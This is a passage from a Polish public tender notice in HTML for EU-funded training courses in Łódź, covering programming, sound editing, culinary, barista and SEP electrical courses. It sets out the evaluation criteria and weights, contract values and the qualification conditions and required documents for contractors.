zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wyznaczył dla części 2 zamówienia następujące kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>Każda z ofert otrzyma łączną liczbę punktów, jaka wynika ze wzoru:<br/>LP = C + D +L<br/>gdzie:<br/>LP - całkowita liczba punktów przyznanych ofercie<br/>C - liczba punktów jakie otrzyma oferta badana za kryterium „Cena oferty brutto w PLN”<br/>P - lic<br/>zba punktów jakie otrzyma oferta badana za kryterium „Doświadczenie kadry”<br/>L - liczba punktów jakie otrzyma oferta badana za kryterium „Liczba godzin przeprowadzonych szkoleń”<br/>Oferta, która uzyska największą liczbę punktów (C + D + L ) w tej części zamówienia, zostanie uznana za ofertę najkorzystniejszą w tej części zamówienia. Łączna możliwa do uzyskania liczba punktów to 100.<br/><br/>Pozostałe informacje znajdują się w rozdziale 24 pkt 24.2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kadry</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba godzin przeprowadzonych szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleń dla nauczycieli oraz szkoleń dla innych uczestników projektu - słuchaczy w ramach realizacji projektu „Akademia Kulinarna” współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020- zgodnie z pkt III OPZ ( Załącznik nr 1 do SWZ)<br/>Szkolenia odbywać się będą w miejscu wskazanym przez Wykonawcę na terenie miasta Łodzi stacjonarnie, z zastrzeżeniem, że na żądanie Zamawiającego (w pełni w gestii Zamawiającego) odbywać się będą zdalnie na bezpłatnej platformie szkoleniowej, zabezpieczonej przez Wykonawcę.<br/>5.4. Szkolenia odbywać się będą w dniach tygodnia wskazanych w OPZ ( Załącznik nr 1 do SWZ)<br/>5.5. Z odbytych szkoleń słuchacze otrzymują zaświadczenia i certyfikaty wystawiane przez Wykonawcę- zgodnie z danymi zawartymi w Załączniku nr 1 do SWZ dla poszczególnych szkoleń<br/>5.6. Przez 1 godzinę szkoleniową (1 h) rozumie się 60 min.<br/>5.7. Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2020 r., poz. 1320), tj. osób wykonujących w trakcie realizacji zamówienia czynności: Zamawiający nie stawia w tym zakresie żadnych wymogów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 165250 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80521000-2 - Usługi opracowywania programów szkoleniowych</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wyznaczył dla części 3 zamówienia następujące kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>Każda z ofert otrzyma łączną liczbę punktów, jaka wynika ze wzoru:<br/>LP = C + D +L<br/>gdzie:<br/>LP - całkowita liczba punktów przyznanych ofercie<br/>C - liczba punktów jakie otrzyma oferta badana za kryterium „Cena oferty brutto w PLN”<br/>P - liczba punktów jakie otrzyma oferta badana za kryterium „Doświadczenie kadry”<br/>L - liczba punktów jakie otrzyma oferta badana za kryterium „Liczba godzin przeprowadzonych szkoleń”<br/>Oferta, która uzyska największą liczbę punktów (C + D + L ) w tej części zamówienia, zostanie uznana za ofertę najkorzystniejszą w tej części zamówienia. Łączna możliwa do uzyskania liczba punktów to 100.<br/>Pozostałe informacje znajdują się w rozdziale 24 pkt 24.3.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kadry</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba godzin przeprowadzonych szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleń SEP dla słuchaczy kierunków technik programista, technik fotografii i multimediów oraz kucharz oraz 20 nauczycieli zatrudnionych w Zespole w ramach realizacji projektów: „Akademia Programowania i Multimediów” i „Akademia kulinarna” współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 zgodnie z pkt IV OPZ <br/>( Załącznik nr 1 do SWZ)<br/>Szkolenia odbywać się będą w miejscu wskazanym przez Wykonawcę na terenie miasta Łodzi stacjonarnie, z zastrzeżeniem, że na żądanie Zamawiającego (w pełni w gestii Zamawiającego) odbywać się będą zdalnie na bezpłatnej platformie szkoleniowej, zabezpieczonej przez Wykonawcę.<br/>5.4. Szkolenia odbywać się będą w dniach tygodnia wskazanych w OPZ ( Załącznik nr 1 do SWZ)<br/>5.5. Z odbytych szkoleń słuchacze otrzymują zaświadczenia i certyfikaty wystawiane przez Wykonawcę- zgodnie z danymi zawartymi w Załączniku nr 1 do SWZ dla poszczególnych szkoleń<br/>5.6. Przez 1 godzinę szkoleniową (1 h) rozumie się 60 min.<br/>5.7. Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U z 2020 r., poz. 1320), tj. osób wykonujących w trakcie realizacji zamówienia czynności: Zamawiający nie stawia w tym zakresie żadnych wymogów. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 79300 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80521000-2 - Usługi opracowywania programów szkoleniowych</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wyznaczył dla części 4 zamówienia następujące kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów ze wszystkich kryteriów. Uzyskana liczba punktów w ramach kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od 5 wynik zostanie zaokrąglony w górę.<br/>Każda z ofert otrzyma łączną liczbę punktów, jaka wynika ze wzoru:<br/>LP = C + D +L<br/>gdzie:<br/>LP - całkowita liczba punktów przyznanych ofercie<br/>C - liczba punktów jakie otrzyma oferta badana za kryterium „Cena oferty brutto w PLN”<br/>P - liczba punktów jakie otrzyma oferta badana za kryterium „Doświadczenie kadry”<br/>L - liczba punktów jakie otrzyma oferta badana za kryterium „Liczba godzin przeprowadzonych szkoleń”<br/>Oferta, która uzyska największą liczbę punktów (C + D + L ) w tej części zamówienia, zostanie uznana za ofertę najkorzystniejszą w tej części zamówienia. Łączna możliwa do uzyskania liczba punktów to 100.<br/>Pozostałe informacje znajdują się w rozdziale 24 pkt 24.4</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba godzin przeprowadzonych szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące: zdolności technicznej lub zawodowej:<br/>Cześć 1 zamówienia:<br/>a) dysponuje co najmniej jedną osobą do prowadzenia szkoleń z zakresu programowania i/lub baz danych i/lub obsługi platformy komunikacyjnej: Szkolenie dot.NET, PHP – MySQL; Szkolenie Java; Szkolenie MySQL - podstawowe operacje; Szkolenie - Komunikacja i zarządzanie informacją w placówce oświatowej; Szkolenie Tworzenie gier 3D, która łącznie spełnia poniższe warunki:<br/>	posiada wykształcenie informatyczne<br/> posiada doświadczenie w zakresie przeprowadzenia szkoleń/kursów z zakresu programowania i/lub baz danych i/lub obsługi platformy komunikacyjnej w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 120 (60 min. każda godzina);<br/>b) dysponuje co najmniej jedną osobą do prowadzenia szkoleń z systemów operacyjnych: szkolenie Networking with Windows Serwer 2016; Szkolenie Linux - administracja poziom zaawansowany która łącznie spełnia poniższe warunki:<br/>	posiada wykształcenie informatyczne <br/>	posiada doświadczenie w zakresie przeprowadzenia szkoleń/kursów z systemów operacyjnych w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 75 (60 min. każda godzina).<br/>c) dysponuje co najmniej jedną osobą do prowadzenia szkoleń z projektowania stron www: Szkolenie Web Design; Szkolenie HTML i CSS; Szkolenie Adobe Photoshop 3D, która łącznie spełnia poniższe warunki:<br/>	posiada wykształcenie informatyczne;<br/>	posiada doświadczenie w zakresie przeprowadzenia szkoleń/kursów z projektowania stron www w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 200 (60 min. każda godzina).<br/>Część 2 zamówienia:<br/>dysponuje co najmniej jedną osobą do prowadzenia szkoleń z nagrywania/obróbki dźwięku, która łącznie spełnia poniższe warunki:<br/>	posiada wykształcenie w kierunku odpowiadającym przedmiotowi szkolenia <br/>dotyczące nagrywania i obróbka dźwięku;<br/>	posiada doświadczenie w zakresie przeprowadzenia szkoleń//kursów z nagrywania/obróbki dźwięku w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 150 (60 min. każda godzina).<br/>Część 3 zamówienia:<br/>a) dysponuje co najmniej jedną osobą do prowadzenia szkoleń z zakresu cukiernictwa: Kurs umiejętności przygotowania tortów o różnych recepturach smakowych- szkolenie dla słuchaczy; Kurs umiejętności przygotowania tortów o różnych recepturach smakowych- szkolenie dla nauczycieli; Kurs umiejętności przygotowania lodów rzemieślniczych- szkolenie dla nauczycieli; Kurs umiejętności przygotowania lodów rzemieślniczych- szkolenie dla słuchaczy, która spełnia poniższe warunki:<br/>	posiada doświadczenie dotyczące przeprowadzenia szkoleń/kursów z zakresu cukiernictwa w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 100 (60 min. każda godzina).<br/>b) dysponuje co najmniej jedną osobą do prowadzenia szkoleń w zakresie kulinariów: Kurs umiejętności przygotowania Sushi; Kurs umiejętności przygotowania wytworów mącznych ciasta pszennego–bułki, chałki rogale; Kurs umiejętności przygotowania wytworów mącznych bezglutenowych– makaron, pizza, chleb; Sushi dla profesjonalistów 1.0), która spełnia poniższe warunki:<br/>	posiada doświadczenie dotyczące przeprowadzenia szkoleń/kursów w zakresie kulinariów w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 120 (60 min. każda godzina).<br/>c) dysponuje co najmniej jedną osobą do prowadzenia szkoleń z zakresu barmaństwa: Sztuka barmańska poziom 1, która spełnia poniższe warunki:<br/>	posiada doświadczenie dotyczące przeprowadzenia szkoleń/kursów z zakresu barmaństwa w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 10 (60 min. każda godzina).<br/>d) dysponuje co najmniej jedną osobą do prowadzenia szkoleń baristy: Szkolenie Barista poziom 1, która spełnia poniższe warunki:<br/>	posiada doświadczenie dotyczące przeprowadzenia szkoleń/kursów baristy w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 10 (60 min. każda godzina).<br/>e) dysponuje co najmniej jedną osobą do prowadzenia szkoleń w zakresie kelnerstwa: Szkolenie kelnerskie, która łącznie spełnia poniższe warunki:<br/>	posiada doświadczenie dotyczące prowadzenia szkoleń/kursów w zakresie kelnerstwa w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 10 (60 min. każda godzina).<br/>Część 4 zamówienia:<br/>dysponuje co najmniej jedną osobą do prowadzenia szkoleń w zakresie SEP, która łącznie spełnia poniższe warunki:<br/>	posiada wykształcenie w kierunku odpowiadającym przedmiotowi szkolenia <br/>w zakresie SEP;<br/>	posiada doświadczenie dotyczące prowadzenia szkoleń/kursów w zakresie SEP w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin szkoleniowych wynoszącą co najmniej 130 (60 min. każda godzina).<br/>Uwaga!<br/>1.	Osoby wskazane celem wykazania spełnienia warunku z pkt 10.1.4.1 -10.1.4.4. nie mogą się powtarzać – zarówno w ramach danej części zamówienia, jak i kilku lub wszystkich części zamówienia, na które Wykonawca składa ofertę<br/>2.	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia lub polegania na zdolnościach podmiotów udostępniających zasoby ww. warunek oceniany będzie łącznie.<br/>3.	Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac przez osoby wskazane w wykazie bezpośrednio u podmiotu, na rzecz którego były wykonane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest dołączyć ww. oświadczenie o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 4a do SWZ. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi<br/>Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 4b do SWZ).Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przezZamawiającego, o których mowa w:Wykonawca zobowiązany jest dołączyć ww. oświadczenie o braku podstaw do wykluczenia z<br/>postępowania – zgodnie z Załącznikiem nr 4a do SWZ. Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi<br/>Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2 SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 4b do SWZ).<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, o których mowa w: 	art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>	art. 108 ust.1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>	art. 108 ust. 1 pkt 5 ustawy Pzp dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>	art. 108 ust. 1 pkt 6 ustawy Pzp.<br/> – zgodnie z Załącznikiem nr 5 do SWZ.<br/>Pozostałe informacje znajdują się w rodziałach 10-15 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest dołączyć ww. oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 3a do SWZ. Wykonawca, który polega<br/>na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania<br/>stanowi Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2 SWZ<br/>SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków<br/>udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 3b<br/>do SWZ).<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi Załącznik nr 6 do SWZ.<br/>Uwaga:<br/>1) Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt. 11.4.2 SWZ, Wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego zdolności technicznej i zawodowej.<br/>. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: <br/> może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków.<br/> Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Pozostałe informacje znajdują się w rodziałach 10-15 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo winno być załączone do oferty.<br/>2 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie<br/>warunków udziału w postepowaniu Wykonawcy wykazują zgodnie z pkt. 10.1 SWZ.<br/>3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w pkt. 11.2 SWZ, składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału, w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, który zakres przedmiotu zamówienia wykonają poszczególni<br/>Wykonawcy (zgodnie z Załącznikiem nr 10 do SWZ).<br/>5 Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6 W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani,<br/>na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe 